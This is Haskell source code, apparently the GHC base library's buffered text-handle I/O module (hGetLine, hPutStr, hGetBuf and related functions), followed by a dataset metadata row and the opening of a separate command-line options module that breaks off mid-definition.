-----------------------------------------------------------------------------
module GHC.IO.Handle.Text (
hWaitForInput, hGetChar, hGetLine, hGetContents, hPutChar, hPutStr,
commitBuffer', -- hack, see below
hGetBuf, hGetBufSome, hGetBufNonBlocking, hPutBuf, hPutBufNonBlocking,
memcpy, hPutStrLn,
) where
import GHC.IO
import GHC.IO.FD
import GHC.IO.Buffer
import qualified GHC.IO.BufferedIO as Buffered
import GHC.IO.Exception
import GHC.Exception
import GHC.IO.Handle.Types
import GHC.IO.Handle.Internals
import qualified GHC.IO.Device as IODevice
import qualified GHC.IO.Device as RawIO
import Foreign
import Foreign.C
import qualified Control.Exception as Exception
import Data.Typeable
import System.IO.Error
import Data.Maybe
import GHC.IORef
import GHC.Base
import GHC.Real
import GHC.Num
import GHC.Show
import GHC.List
-- ---------------------------------------------------------------------------
-- Simple input operations
-- If hWaitForInput finds anything in the Handle's buffer, it
-- immediately returns. If not, it tries to read from the underlying
-- OS handle. Notice that for buffered Handles connected to terminals
-- this means waiting until a complete line is available.
-- | Computation 'hWaitForInput' @hdl t@
-- waits until input is available on handle @hdl@.
-- It returns 'True' as soon as input is available on @hdl@,
-- or 'False' if no input is available within @t@ milliseconds. Note that
-- 'hWaitForInput' waits until one or more full /characters/ are available,
-- which means that it needs to do decoding, and hence may fail
-- with a decoding error.
--
-- If @t@ is less than zero, then @hWaitForInput@ waits indefinitely.
--
-- This operation may fail with:
--
-- * 'isEOFError' if the end of file has been reached.
--
-- * a decoding error, if the input begins with an invalid byte sequence
-- in this Handle's encoding.
--
-- NOTE for GHC users: unless you use the @-threaded@ flag,
-- @hWaitForInput hdl t@ where @t >= 0@ will block all other Haskell
-- threads for the duration of the call. It behaves like a
-- @safe@ foreign call in this respect.
--
hWaitForInput :: Handle -> Int -> IO Bool
hWaitForInput h msecs = do
wantReadableHandle_ "hWaitForInput" h $ \ handle_@Handle__{..} -> do
cbuf <- readIORef haCharBuffer
if not (isEmptyBuffer cbuf) then return True else do
if msecs < 0
then do cbuf' <- readTextDevice handle_ cbuf
writeIORef haCharBuffer cbuf'
return True
else do
-- there might be bytes in the byte buffer waiting to be decoded
cbuf' <- decodeByteBuf handle_ cbuf
writeIORef haCharBuffer cbuf'
if not (isEmptyBuffer cbuf') then return True else do
r <- IODevice.ready haDevice False{-read-} msecs
if r then do -- Call hLookAhead' to throw an EOF
-- exception if appropriate
_ <- hLookAhead_ handle_
return True
else return False
-- XXX we should only return when there are full characters
-- not when there are only bytes. That would mean looping
-- and re-running IODevice.ready if we don't have any full
-- characters; but we don't know how long we've waited
-- so far.
-- ---------------------------------------------------------------------------
-- hGetChar
-- | Computation 'hGetChar' @hdl@ reads a character from the file or
-- channel managed by @hdl@, blocking until a character is available.
--
-- This operation may fail with:
--
-- * 'isEOFError' if the end of file has been reached.
hGetChar :: Handle -> IO Char
hGetChar handle =
wantReadableHandle_ "hGetChar" handle $ \handle_@Handle__{..} -> do
-- buffering mode makes no difference: we just read whatever is available
-- from the device (blocking only if there is nothing available), and then
-- return the first character.
-- See [note Buffered Reading] in GHC.IO.Handle.Types
buf0 <- readIORef haCharBuffer
buf1 <- if isEmptyBuffer buf0
then readTextDevice handle_ buf0
else return buf0
(c1,i) <- readCharBuf (bufRaw buf1) (bufL buf1)
let buf2 = bufferAdjustL i buf1
if haInputNL == CRLF && c1 == '\r'
then do
mbuf3 <- if isEmptyBuffer buf2
then maybeFillReadBuffer handle_ buf2
else return (Just buf2)
case mbuf3 of
-- EOF, so just return the '\r' we have
Nothing -> do
writeIORef haCharBuffer buf2
return '\r'
Just buf3 -> do
(c2,i2) <- readCharBuf (bufRaw buf2) (bufL buf2)
if c2 == '\n'
then do
writeIORef haCharBuffer (bufferAdjustL i2 buf3)
return '\n'
else do
-- not a \r\n sequence, so just return the \r
writeIORef haCharBuffer buf3
return '\r'
else do
writeIORef haCharBuffer buf2
return c1
-- ---------------------------------------------------------------------------
-- hGetLine
-- | Computation 'hGetLine' @hdl@ reads a line from the file or
-- channel managed by @hdl@.
--
-- This operation may fail with:
--
-- * 'isEOFError' if the end of file is encountered when reading
-- the /first/ character of the line.
--
-- If 'hGetLine' encounters end-of-file at any other point while reading
-- in a line, it is treated as a line terminator and the (partial)
-- line is returned.
hGetLine :: Handle -> IO String
hGetLine h =
wantReadableHandle_ "hGetLine" h $ \ handle_ -> do
hGetLineBuffered handle_
hGetLineBuffered :: Handle__ -> IO String
hGetLineBuffered handle_@Handle__{..} = do
buf <- readIORef haCharBuffer
hGetLineBufferedLoop handle_ buf []
hGetLineBufferedLoop :: Handle__
-> CharBuffer -> [String]
-> IO String
hGetLineBufferedLoop handle_@Handle__{..}
buf@Buffer{ bufL=r0, bufR=w, bufRaw=raw0 } xss =
let
-- find the end-of-line character, if there is one
loop raw r
| r == w = return (False, w)
| otherwise = do
(c,r') <- readCharBuf raw r
if c == '\n'
then return (True, r) -- NB. not r': don't include the '\n'
else loop raw r'
in do
(eol, off) <- loop raw0 r0
debugIO ("hGetLineBufferedLoop: r=" ++ show r0 ++ ", w=" ++ show w ++ ", off=" ++ show off)
(xs,r') <- if haInputNL == CRLF
then unpack_nl raw0 r0 off ""
else do xs <- unpack raw0 r0 off ""
return (xs,off)
-- if eol == True, then off is the offset of the '\n'
-- otherwise off == w and the buffer is now empty.
if eol -- r' == off
then do writeIORef haCharBuffer (bufferAdjustL (off+1) buf)
return (concat (reverse (xs:xss)))
else do
let buf1 = bufferAdjustL r' buf
maybe_buf <- maybeFillReadBuffer handle_ buf1
case maybe_buf of
-- Nothing indicates we caught an EOF, and we may have a
-- partial line to return.
Nothing -> do
-- we reached EOF. There might be a lone \r left
-- in the buffer, so check for that and
-- append it to the line if necessary.
--
let pre = if not (isEmptyBuffer buf1) then "\r" else ""
writeIORef haCharBuffer buf1{ bufL=0, bufR=0 }
let str = concat (reverse (pre:xs:xss))
if not (null str)
then return str
else ioe_EOF
Just new_buf ->
hGetLineBufferedLoop handle_ new_buf (xs:xss)
maybeFillReadBuffer :: Handle__ -> CharBuffer -> IO (Maybe CharBuffer)
maybeFillReadBuffer handle_ buf
= catchException
(do buf' <- getSomeCharacters handle_ buf
return (Just buf')
)
(\e -> do if isEOFError e
then return Nothing
else ioError e)
-- See GHC.IO.Buffer
-- #define CHARBUF_UTF16
-- NB. performance-critical code: eyeball the Core.
unpack :: RawCharBuffer -> Int -> Int -> [Char] -> IO [Char]
unpack !buf !r !w acc0
| r == w = return acc0
| otherwise =
withRawBuffer buf $ \pbuf ->
let
unpackRB acc !i
| i < r = return acc
| otherwise = do
-- Here, we are rather careful to only put an *evaluated* character
-- in the output string. Due to pointer tagging, this allows the consumer
-- to avoid ping-ponging between the actual consumer code and the thunk code
c <- peekElemOff pbuf i
unpackRB (c : acc) (i-1)
in
unpackRB acc0 (w-1)
-- NB. performance-critical code: eyeball the Core.
unpack_nl :: RawCharBuffer -> Int -> Int -> [Char] -> IO ([Char],Int)
unpack_nl !buf !r !w acc0
| r == w = return (acc0, 0)
| otherwise =
withRawBuffer buf $ \pbuf ->
let
unpackRB acc !i
| i < r = return acc
| otherwise = do
c <- peekElemOff pbuf i
if (c == '\n' && i > r)
then do
c1 <- peekElemOff pbuf (i-1)
if (c1 == '\r')
then unpackRB ('\n':acc) (i-2)
else unpackRB ('\n':acc) (i-1)
else do
unpackRB (c : acc) (i-1)
in do
c <- peekElemOff pbuf (w-1)
if (c == '\r')
then do
-- If the last char is a '\r', we need to know whether or
-- not it is followed by a '\n', so leave it in the buffer
-- for now and just unpack the rest.
str <- unpackRB acc0 (w-2)
return (str, w-1)
else do
str <- unpackRB acc0 (w-1)
return (str, w)
-- Note [#5536]
--
-- We originally had
--
-- let c' = desurrogatifyRoundtripCharacter c in
-- c' `seq` unpackRB (c':acc) (i-1)
--
-- but this resulted in Core like
--
-- case (case x <# y of True -> C# e1; False -> C# e2) of c
-- C# _ -> unpackRB (c:acc) (i-1)
--
-- which compiles into a continuation for the outer case, with each
-- branch of the inner case building a C# and then jumping to the
-- continuation. We'd rather not have this extra jump, which makes
-- quite a difference to performance (see #5536) It turns out that
-- matching on the C# directly causes GHC to do the case-of-case,
-- giving much straighter code.
-- -----------------------------------------------------------------------------
-- hGetContents
-- hGetContents on a DuplexHandle only affects the read side: you can
-- carry on writing to it afterwards.
-- | Computation 'hGetContents' @hdl@ returns the list of characters
-- corresponding to the unread portion of the channel or file managed
-- by @hdl@, which is put into an intermediate state, /semi-closed/.
-- In this state, @hdl@ is effectively closed,
-- but items are read from @hdl@ on demand and accumulated in a special
-- list returned by 'hGetContents' @hdl@.
--
-- Any operation that fails because a handle is closed,
-- also fails if a handle is semi-closed. The only exception is 'hClose'.
-- A semi-closed handle becomes closed:
--
-- * if 'hClose' is applied to it;
--
-- * if an I\/O error occurs when reading an item from the handle;
--
-- * or once the entire contents of the handle has been read.
--
-- Once a semi-closed handle becomes closed, the contents of the
-- associated list becomes fixed. The contents of this final list is
-- only partially specified: it will contain at least all the items of
-- the stream that were evaluated prior to the handle becoming closed.
--
-- Any I\/O errors encountered while a handle is semi-closed are simply
-- discarded.
--
-- This operation may fail with:
--
-- * 'isEOFError' if the end of file has been reached.
hGetContents :: Handle -> IO String
hGetContents handle =
wantReadableHandle "hGetContents" handle $ \handle_ -> do
xs <- lazyRead handle
return (handle_{ haType=SemiClosedHandle}, xs )
-- Note that someone may close the semi-closed handle (or change its
-- buffering), so each time these lazy read functions are pulled on,
-- they have to check whether the handle has indeed been closed.
lazyRead :: Handle -> IO String
lazyRead handle =
unsafeInterleaveIO $
withHandle "hGetContents" handle $ \ handle_ -> do
case haType handle_ of
SemiClosedHandle -> lazyReadBuffered handle handle_
ClosedHandle
-> ioException
(IOError (Just handle) IllegalOperation "hGetContents"
"delayed read on closed handle" Nothing Nothing)
_ -> ioException
(IOError (Just handle) IllegalOperation "hGetContents"
"illegal handle type" Nothing Nothing)
lazyReadBuffered :: Handle -> Handle__ -> IO (Handle__, [Char])
lazyReadBuffered h handle_@Handle__{..} = do
buf <- readIORef haCharBuffer
Exception.catch
(do
buf'@Buffer{..} <- getSomeCharacters handle_ buf
lazy_rest <- lazyRead h
(s,r) <- if haInputNL == CRLF
then unpack_nl bufRaw bufL bufR lazy_rest
else do s <- unpack bufRaw bufL bufR lazy_rest
return (s,bufR)
writeIORef haCharBuffer (bufferAdjustL r buf')
return (handle_, s)
)
(\e -> do (handle_', _) <- hClose_help handle_
debugIO ("hGetContents caught: " ++ show e)
-- We might have a \r cached in CRLF mode. So we
-- need to check for that and return it:
let r = if isEOFError e
then if not (isEmptyBuffer buf)
then "\r"
else ""
else
throw (augmentIOError e "hGetContents" h)
return (handle_', r)
)
-- ensure we have some characters in the buffer
getSomeCharacters :: Handle__ -> CharBuffer -> IO CharBuffer
getSomeCharacters handle_@Handle__{..} buf@Buffer{..} =
case bufferElems buf of
-- buffer empty: read some more
0 -> readTextDevice handle_ buf
-- if the buffer has a single '\r' in it and we're doing newline
-- translation: read some more
1 | haInputNL == CRLF -> do
(c,_) <- readCharBuf bufRaw bufL
if c == '\r'
then do -- shuffle the '\r' to the beginning. This is only safe
-- if we're about to call readTextDevice, otherwise it
-- would mess up flushCharBuffer.
-- See [note Buffer Flushing], GHC.IO.Handle.Types
_ <- writeCharBuf bufRaw 0 '\r'
let buf' = buf{ bufL=0, bufR=1 }
readTextDevice handle_ buf'
else do
return buf
-- buffer has some chars in it already: just return it
_otherwise ->
return buf
-- ---------------------------------------------------------------------------
-- hPutChar
-- | Computation 'hPutChar' @hdl ch@ writes the character @ch@ to the
-- file or channel managed by @hdl@. Characters may be buffered if
-- buffering is enabled for @hdl@.
--
-- This operation may fail with:
--
-- * 'isFullError' if the device is full; or
--
-- * 'isPermissionError' if another system resource limit would be exceeded.
hPutChar :: Handle -> Char -> IO ()
hPutChar handle c = do
c `seq` return ()
wantWritableHandle "hPutChar" handle $ \ handle_ -> do
hPutcBuffered handle_ c
hPutcBuffered :: Handle__ -> Char -> IO ()
hPutcBuffered handle_@Handle__{..} c = do
buf <- readIORef haCharBuffer
if c == '\n'
then do buf1 <- if haOutputNL == CRLF
then do
buf1 <- putc buf '\r'
putc buf1 '\n'
else do
putc buf '\n'
writeCharBuffer handle_ buf1
when is_line $ flushByteWriteBuffer handle_
else do
buf1 <- putc buf c
writeCharBuffer handle_ buf1
return ()
where
is_line = case haBufferMode of
LineBuffering -> True
_ -> False
putc buf@Buffer{ bufRaw=raw, bufR=w } c = do
debugIO ("putc: " ++ summaryBuffer buf)
w' <- writeCharBuf raw w c
return buf{ bufR = w' }
-- ---------------------------------------------------------------------------
-- hPutStr
-- We go to some trouble to avoid keeping the handle locked while we're
-- evaluating the string argument to hPutStr, in case doing so triggers another
-- I/O operation on the same handle which would lead to deadlock. The classic
-- case is
--
-- putStr (trace "hello" "world")
--
-- so the basic scheme is this:
--
-- * copy the string into a fresh buffer,
-- * "commit" the buffer to the handle.
--
-- Committing may involve simply copying the contents of the new
-- buffer into the handle's buffer, flushing one or both buffers, or
-- maybe just swapping the buffers over (if the handle's buffer was
-- empty). See commitBuffer below.
-- | Computation 'hPutStr' @hdl s@ writes the string
-- @s@ to the file or channel managed by @hdl@.
--
-- This operation may fail with:
--
-- * 'isFullError' if the device is full; or
--
-- * 'isPermissionError' if another system resource limit would be exceeded.
hPutStr :: Handle -> String -> IO ()
hPutStr handle str = hPutStr' handle str False
-- | The same as 'hPutStr', but adds a newline character.
hPutStrLn :: Handle -> String -> IO ()
hPutStrLn handle str = hPutStr' handle str True
-- An optimisation: we treat hPutStrLn specially, to avoid the
-- overhead of a single putChar '\n', which is quite high now that we
-- have to encode eagerly.
hPutStr' :: Handle -> String -> Bool -> IO ()
hPutStr' handle str add_nl =
do
(buffer_mode, nl) <-
wantWritableHandle "hPutStr" handle $ \h_ -> do
bmode <- getSpareBuffer h_
return (bmode, haOutputNL h_)
case buffer_mode of
(NoBuffering, _) -> do
hPutChars handle str -- v. slow, but we don't care
when add_nl $ hPutChar handle '\n'
(LineBuffering, buf) -> do
writeBlocks handle True add_nl nl buf str
(BlockBuffering _, buf) -> do
writeBlocks handle False add_nl nl buf str
hPutChars :: Handle -> [Char] -> IO ()
hPutChars _ [] = return ()
hPutChars handle (c:cs) = hPutChar handle c >> hPutChars handle cs
getSpareBuffer :: Handle__ -> IO (BufferMode, CharBuffer)
getSpareBuffer Handle__{haCharBuffer=ref,
haBuffers=spare_ref,
haBufferMode=mode}
= do
case mode of
NoBuffering -> return (mode, errorWithoutStackTrace "no buffer!")
_ -> do
bufs <- readIORef spare_ref
buf <- readIORef ref
case bufs of
BufferListCons b rest -> do
writeIORef spare_ref rest
return ( mode, emptyBuffer b (bufSize buf) WriteBuffer)
BufferListNil -> do
new_buf <- newCharBuffer (bufSize buf) WriteBuffer
return (mode, new_buf)
-- NB. performance-critical code: eyeball the Core.
writeBlocks :: Handle -> Bool -> Bool -> Newline -> Buffer CharBufElem -> String -> IO ()
writeBlocks hdl line_buffered add_nl nl
buf@Buffer{ bufRaw=raw, bufSize=len } s =
let
shoveString :: Int -> [Char] -> [Char] -> IO ()
shoveString !n [] [] = do
commitBuffer hdl raw len n False{-no flush-} True{-release-}
shoveString !n [] rest = do
shoveString n rest []
shoveString !n (c:cs) rest
-- n+1 so we have enough room to write '\r\n' if necessary
| n + 1 >= len = do
commitBuffer hdl raw len n False{-flush-} False
shoveString 0 (c:cs) rest
| c == '\n' = do
n' <- if nl == CRLF
then do
n1 <- writeCharBuf raw n '\r'
writeCharBuf raw n1 '\n'
else do
writeCharBuf raw n c
if line_buffered
then do
-- end of line, so write and flush
commitBuffer hdl raw len n' True{-flush-} False
shoveString 0 cs rest
else do
shoveString n' cs rest
| otherwise = do
n' <- writeCharBuf raw n c
shoveString n' cs rest
in
shoveString 0 s (if add_nl then "\n" else "")
-- -----------------------------------------------------------------------------
-- commitBuffer handle buf sz count flush release
--
-- Write the contents of the buffer 'buf' ('sz' bytes long, containing
-- 'count' bytes of data) to handle (handle must be block or line buffered).
commitBuffer
:: Handle -- handle to commit to
-> RawCharBuffer -> Int -- address and size (in bytes) of buffer
-> Int -- number of bytes of data in buffer
-> Bool -- True <=> flush the handle afterward
-> Bool -- release the buffer?
-> IO ()
commitBuffer hdl !raw !sz !count flush release =
wantWritableHandle "commitBuffer" hdl $ \h_@Handle__{..} -> do
debugIO ("commitBuffer: sz=" ++ show sz ++ ", count=" ++ show count
++ ", flush=" ++ show flush ++ ", release=" ++ show release)
writeCharBuffer h_ Buffer{ bufRaw=raw, bufState=WriteBuffer,
bufL=0, bufR=count, bufSize=sz }
when flush $ flushByteWriteBuffer h_
-- release the buffer if necessary
when release $ do
-- find size of current buffer
old_buf@Buffer{ bufSize=size } <- readIORef haCharBuffer
when (sz == size) $ do
spare_bufs <- readIORef haBuffers
writeIORef haBuffers (BufferListCons raw spare_bufs)
return ()
-- backwards compatibility; the text package uses this
commitBuffer' :: RawCharBuffer -> Int -> Int -> Bool -> Bool -> Handle__
-> IO CharBuffer
commitBuffer' raw sz@(I# _) count@(I# _) flush release h_@Handle__{..}
= do
debugIO ("commitBuffer: sz=" ++ show sz ++ ", count=" ++ show count
++ ", flush=" ++ show flush ++ ", release=" ++ show release)
let this_buf = Buffer{ bufRaw=raw, bufState=WriteBuffer,
bufL=0, bufR=count, bufSize=sz }
writeCharBuffer h_ this_buf
when flush $ flushByteWriteBuffer h_
-- release the buffer if necessary
when release $ do
-- find size of current buffer
old_buf@Buffer{ bufSize=size } <- readIORef haCharBuffer
when (sz == size) $ do
spare_bufs <- readIORef haBuffers
writeIORef haBuffers (BufferListCons raw spare_bufs)
return this_buf
-- ---------------------------------------------------------------------------
-- Reading/writing sequences of bytes.
-- ---------------------------------------------------------------------------
-- hPutBuf
-- | 'hPutBuf' @hdl buf count@ writes @count@ 8-bit bytes from the
-- buffer @buf@ to the handle @hdl@. It returns ().
--
-- 'hPutBuf' ignores any text encoding that applies to the 'Handle',
-- writing the bytes directly to the underlying file or device.
--
-- 'hPutBuf' ignores the prevailing 'TextEncoding' and
-- 'NewlineMode' on the 'Handle', and writes bytes directly.
--
-- This operation may fail with:
--
-- * 'ResourceVanished' if the handle is a pipe or socket, and the
-- reading end is closed. (If this is a POSIX system, and the program
-- has not asked to ignore SIGPIPE, then a SIGPIPE may be delivered
-- instead, whose default action is to terminate the program).
hPutBuf :: Handle -- handle to write to
-> Ptr a -- address of buffer
-> Int -- number of bytes of data in buffer
-> IO ()
hPutBuf h ptr count = do _ <- hPutBuf' h ptr count True
return ()
hPutBufNonBlocking
:: Handle -- handle to write to
-> Ptr a -- address of buffer
-> Int -- number of bytes of data in buffer
-> IO Int -- returns: number of bytes written
hPutBufNonBlocking h ptr count = hPutBuf' h ptr count False
hPutBuf':: Handle -- handle to write to
-> Ptr a -- address of buffer
-> Int -- number of bytes of data in buffer
-> Bool -- allow blocking?
-> IO Int
hPutBuf' handle ptr count can_block
| count == 0 = return 0
| count < 0 = illegalBufferSize handle "hPutBuf" count
| otherwise =
wantWritableHandle "hPutBuf" handle $
\ h_@Handle__{..} -> do
debugIO ("hPutBuf count=" ++ show count)
r <- bufWrite h_ (castPtr ptr) count can_block
-- we must flush if this Handle is set to NoBuffering. If
-- it is set to LineBuffering, be conservative and flush
-- anyway (we didn't check for newlines in the data).
case haBufferMode of
BlockBuffering _ -> do return ()
_line_or_no_buffering -> do flushWriteBuffer h_
return r
bufWrite :: Handle__-> Ptr Word8 -> Int -> Bool -> IO Int
bufWrite h_@Handle__{..} ptr count can_block =
seq count $ do -- strictness hack
old_buf@Buffer{ bufRaw=old_raw, bufR=w, bufSize=size }
<- readIORef haByteBuffer
-- enough room in handle buffer?
if (size - w > count)
-- There's enough room in the buffer:
-- just copy the data in and update bufR.
then do debugIO ("hPutBuf: copying to buffer, w=" ++ show w)
copyToRawBuffer old_raw w ptr count
writeIORef haByteBuffer old_buf{ bufR = w + count }
return count
-- else, we have to flush
else do debugIO "hPutBuf: flushing first"
old_buf' <- Buffered.flushWriteBuffer haDevice old_buf
-- TODO: we should do a non-blocking flush here
writeIORef haByteBuffer old_buf'
-- if we can fit in the buffer, then just loop
if count < size
then bufWrite h_ ptr count can_block
else if can_block
then do writeChunk h_ (castPtr ptr) count
return count
else writeChunkNonBlocking h_ (castPtr ptr) count
writeChunk :: Handle__ -> Ptr Word8 -> Int -> IO ()
writeChunk h_@Handle__{..} ptr bytes
| Just fd <- cast haDevice = RawIO.write (fd::FD) ptr bytes
| otherwise = error "Todo: hPutBuf"
writeChunkNonBlocking :: Handle__ -> Ptr Word8 -> Int -> IO Int
writeChunkNonBlocking h_@Handle__{..} ptr bytes
| Just fd <- cast haDevice = RawIO.writeNonBlocking (fd::FD) ptr bytes
| otherwise = error "Todo: hPutBuf"
-- ---------------------------------------------------------------------------
-- hGetBuf
-- | 'hGetBuf' @hdl buf count@ reads data from the handle @hdl@
-- into the buffer @buf@ until either EOF is reached or
-- @count@ 8-bit bytes have been read.
-- It returns the number of bytes actually read. This may be zero if
-- EOF was reached before any data was read (or if @count@ is zero).
--
-- 'hGetBuf' never raises an EOF exception, instead it returns a value
-- smaller than @count@.
--
-- If the handle is a pipe or socket, and the writing end
-- is closed, 'hGetBuf' will behave as if EOF was reached.
--
-- 'hGetBuf' ignores the prevailing 'TextEncoding' and 'NewlineMode'
-- on the 'Handle', and reads bytes directly.
hGetBuf :: Handle -> Ptr a -> Int -> IO Int
hGetBuf h ptr count
| count == 0 = return 0
| count < 0 = illegalBufferSize h "hGetBuf" count
| otherwise =
wantReadableHandle_ "hGetBuf" h $ \ h_@Handle__{..} -> do
flushCharReadBuffer h_
buf@Buffer{ bufRaw=raw, bufR=w, bufL=r, bufSize=sz }
<- readIORef haByteBuffer
if isEmptyBuffer buf
then bufReadEmpty h_ buf (castPtr ptr) 0 count
else bufReadNonEmpty h_ buf (castPtr ptr) 0 count
-- small reads go through the buffer, large reads are satisfied by
-- taking data first from the buffer and then direct from the file
-- descriptor.
bufReadNonEmpty :: Handle__ -> Buffer Word8 -> Ptr Word8 -> Int -> Int -> IO Int
bufReadNonEmpty h_@Handle__{..}
buf@Buffer{ bufRaw=raw, bufR=w, bufL=r, bufSize=sz }
ptr !so_far !count
= do
let avail = w - r
if (count < avail)
then do
copyFromRawBuffer ptr raw r count
writeIORef haByteBuffer buf{ bufL = r + count }
return (so_far + count)
else do
copyFromRawBuffer ptr raw r avail
let buf' = buf{ bufR=0, bufL=0 }
writeIORef haByteBuffer buf'
let remaining = count - avail
so_far' = so_far + avail
ptr' = ptr `plusPtr` avail
if remaining == 0
then return so_far'
else bufReadEmpty h_ buf' ptr' so_far' remaining
bufReadEmpty :: Handle__ -> Buffer Word8 -> Ptr Word8 -> Int -> Int -> IO Int
bufReadEmpty h_@Handle__{..}
buf@Buffer{ bufRaw=raw, bufR=w, bufL=r, bufSize=sz }
ptr so_far count
| count > sz, Just fd <- cast haDevice = loop fd 0 count
| otherwise = do
(r,buf') <- Buffered.fillReadBuffer haDevice buf
if r == 0
then return so_far
else do writeIORef haByteBuffer buf'
bufReadNonEmpty h_ buf' ptr so_far count
where
loop :: FD -> Int -> Int -> IO Int
loop fd off bytes | bytes <= 0 = return (so_far + off)
loop fd off bytes = do
r <- RawIO.read (fd::FD) (ptr `plusPtr` off) bytes
if r == 0
then return (so_far + off)
else loop fd (off + r) (bytes - r)
-- ---------------------------------------------------------------------------
-- hGetBufSome
-- | 'hGetBufSome' @hdl buf count@ reads data from the handle @hdl@
-- into the buffer @buf@. If there is any data available to read,
-- then 'hGetBufSome' returns it immediately; it only blocks if there
-- is no data to be read.
--
-- It returns the number of bytes actually read. This may be zero if
-- EOF was reached before any data was read (or if @count@ is zero).
--
-- 'hGetBufSome' never raises an EOF exception, instead it returns a value
-- smaller than @count@.
--
-- If the handle is a pipe or socket, and the writing end
-- is closed, 'hGetBufSome' will behave as if EOF was reached.
--
-- 'hGetBufSome' ignores the prevailing 'TextEncoding' and 'NewlineMode'
-- on the 'Handle', and reads bytes directly.
hGetBufSome :: Handle -> Ptr a -> Int -> IO Int
hGetBufSome h ptr count
| count == 0 = return 0
| count < 0 = illegalBufferSize h "hGetBufSome" count
| otherwise =
wantReadableHandle_ "hGetBufSome" h $ \ h_@Handle__{..} -> do
flushCharReadBuffer h_
buf@Buffer{ bufSize=sz } <- readIORef haByteBuffer
if isEmptyBuffer buf
then case count > sz of -- large read? optimize it with a little special case:
True | Just fd <- haFD h_ -> do RawIO.read fd (castPtr ptr) count
_ -> do (r,buf') <- Buffered.fillReadBuffer haDevice buf
if r == 0
then return 0
else do writeIORef haByteBuffer buf'
bufReadNBNonEmpty h_ buf' (castPtr ptr) 0 (min r count)
-- new count is (min r count), so
-- that bufReadNBNonEmpty will not
-- issue another read.
else
let count' = min count (bufferElems buf)
in bufReadNBNonEmpty h_ buf (castPtr ptr) 0 count'
haFD :: Handle__ -> Maybe FD
haFD h_@Handle__{..} = cast haDevice
-- | 'hGetBufNonBlocking' @hdl buf count@ reads data from the handle @hdl@
-- into the buffer @buf@ until either EOF is reached, or
-- @count@ 8-bit bytes have been read, or there is no more data available
-- to read immediately.
--
-- 'hGetBufNonBlocking' is identical to 'hGetBuf', except that it will
-- never block waiting for data to become available, instead it returns
-- only whatever data is available. To wait for data to arrive before
-- calling 'hGetBufNonBlocking', use 'hWaitForInput'.
--
-- If the handle is a pipe or socket, and the writing end
-- is closed, 'hGetBufNonBlocking' will behave as if EOF was reached.
--
-- 'hGetBufNonBlocking' ignores the prevailing 'TextEncoding' and
-- 'NewlineMode' on the 'Handle', and reads bytes directly.
--
-- NOTE: on Windows, this function does not work correctly; it
-- behaves identically to 'hGetBuf'.
hGetBufNonBlocking :: Handle -> Ptr a -> Int -> IO Int
hGetBufNonBlocking h ptr count
| count == 0 = return 0
| count < 0 = illegalBufferSize h "hGetBufNonBlocking" count
| otherwise =
wantReadableHandle_ "hGetBufNonBlocking" h $ \ h_@Handle__{..} -> do
flushCharReadBuffer h_
buf@Buffer{ bufRaw=raw, bufR=w, bufL=r, bufSize=sz }
<- readIORef haByteBuffer
if isEmptyBuffer buf
then bufReadNBEmpty h_ buf (castPtr ptr) 0 count
else bufReadNBNonEmpty h_ buf (castPtr ptr) 0 count
bufReadNBEmpty :: Handle__ -> Buffer Word8 -> Ptr Word8 -> Int -> Int -> IO Int
bufReadNBEmpty h_@Handle__{..}
buf@Buffer{ bufRaw=raw, bufR=w, bufL=r, bufSize=sz }
ptr so_far count
| count > sz,
Just fd <- cast haDevice = do
m <- RawIO.readNonBlocking (fd::FD) ptr count
case m of
Nothing -> return so_far
Just n -> return (so_far + n)
| otherwise = do
buf <- readIORef haByteBuffer
(r,buf') <- Buffered.fillReadBuffer0 haDevice buf
case r of
Nothing -> return so_far
Just 0 -> return so_far
Just r -> do
writeIORef haByteBuffer buf'
bufReadNBNonEmpty h_ buf' ptr so_far (min count r)
-- NOTE: new count is min count r
-- so we will just copy the contents of the
-- buffer in the recursive call, and not
-- loop again.
bufReadNBNonEmpty :: Handle__ -> Buffer Word8 -> Ptr Word8 -> Int -> Int -> IO Int
bufReadNBNonEmpty h_@Handle__{..}
buf@Buffer{ bufRaw=raw, bufR=w, bufL=r, bufSize=sz }
ptr so_far count
= do
let avail = w - r
if (count < avail)
then do
copyFromRawBuffer ptr raw r count
writeIORef haByteBuffer buf{ bufL = r + count }
return (so_far + count)
else do
copyFromRawBuffer ptr raw r avail
let buf' = buf{ bufR=0, bufL=0 }
writeIORef haByteBuffer buf'
let remaining = count - avail
so_far' = so_far + avail
ptr' = ptr `plusPtr` avail
if remaining == 0
then return so_far'
else bufReadNBEmpty h_ buf' ptr' so_far' remaining
-- ---------------------------------------------------------------------------
-- memcpy wrappers
copyToRawBuffer :: RawBuffer e -> Int -> Ptr e -> Int -> IO ()
copyToRawBuffer raw off ptr bytes =
withRawBuffer raw $ \praw ->
do _ <- memcpy (praw `plusPtr` off) ptr (fromIntegral bytes)
return ()
copyFromRawBuffer :: Ptr e -> RawBuffer e -> Int -> Int -> IO ()
copyFromRawBuffer ptr raw off bytes =
withRawBuffer raw $ \praw ->
do _ <- memcpy ptr (praw `plusPtr` off) (fromIntegral bytes)
return ()
foreign import ccall unsafe "memcpy"
memcpy :: Ptr a -> Ptr a -> CSize -> IO (Ptr ())
-----------------------------------------------------------------------------
-- Internal Utils
illegalBufferSize :: Handle -> String -> Int -> IO a
illegalBufferSize handle fn sz =
ioException (IOError (Just handle)
InvalidArgument fn
("illegal buffer size " ++ showsPrec 9 sz [])
Nothing Nothing)
| phischu/fragnix | builtins/base/GHC.IO.Handle.Text.hs | bsd-3-clause | 37,745 | 0 | 25 | 11,805 | 7,586 | 3,871 | 3,715 | 560 | 7 |
module Options (
Option(..)
, getOptions
, ghcOptions
, haddockOptions
) where
import Control.Monad (when)
import System.Environment (getArgs)
import System.Exit
import System.Console.GetOpt
import qualified Documentation.Haddock as Haddock
data Option = Help
| Verbose
| GhcOption String
| DumpOnly
deriving (Show, Eq)
documentedOptions :: [OptDescr Option]
documentedOptions = [
Option [] ["help"] (NoArg Help) "display this help and exit"
, Option ['v'] ["verbose"] (NoArg Verbose) "explain what is being done, enable Haddock warnings"
, Option [] ["optghc"] (ReqArg GhcOption "OPTION") "option to be forwarded to GHC"
]
undocumentedOptions :: [OptDescr Option]
undocumentedOptions = [
Option [] ["dump-only"] (NoArg DumpOnly) "dump extracted test cases to stdout"
]
getOptions :: IO ([Option], [String])
getOptions = do
args <- getArgs
let (options, modules, errors) = getOpt Permute (documentedOptions ++ undocumentedOptions) args
when (Help `elem` options)
(printAndExit usage)
when ((not . null) errors)
(tryHelp $ head errors)
when (null modules)
(tryHelp "no input files\n")
return (options, modules)
where
